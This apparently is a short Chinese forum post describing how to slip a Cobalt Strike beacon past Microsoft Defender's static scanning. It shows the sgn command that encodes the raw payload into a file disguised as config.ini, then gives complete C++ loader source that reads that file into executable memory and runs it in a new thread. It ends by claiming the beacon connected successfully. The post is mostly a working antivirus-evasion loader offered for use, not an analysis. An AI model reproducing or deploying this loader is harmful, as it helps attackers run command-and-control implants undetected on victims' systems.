绕过defender上线cs
一、前言
文件分离执行 可以过掉defender的静态查杀。
二、文件加密用cs生成一个x64的raw 使用sgn工具对raw文件进行加密 - sgn.exe -i payload_x64.bin -c 5 -o config.ini
编写一个加载器 - #define _CRT_SECURE_NO_WARNINGS
- #include <Windows.h>
- #include <iostream>
- void T(LPCSTR NAME)
- {
- //读取文件
- HANDLE hFile = CreateFileA(NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
- if (hFile == INVALID_HANDLE_VALUE)
- {
- printf("CreateFileA failed: %lu\n", GetLastError());;
- }
- DWORD dwSize = 0;
- dwSize = GetFileSize(hFile, NULL); //获取文件大小
- //申请内存
- LPVOID lpAddress = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- if (lpAddress == NULL)
- {
- printf("VirtualAlloc failed: %lu\n", GetLastError());;
- }
- DWORD dwRead = 0;
- //读取文件到内存
- ReadFile(hFile, lpAddress, dwSize, &dwRead, 0);
- //创建线程
- HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpAddress, NULL, 0, NULL);
- //等待线程执行完毕
- WaitForSingleObject(hThread, INFINITE);
- }
- int main(int argc, char* argv[])
- {
- if (argc < 2) {
- printf("参数不对");
- return 1;
- }
- T(argv[1]);
- return 0;
- }
静态查杀过了。 成功上线
| 
发表于 2025-12-12 15:54:17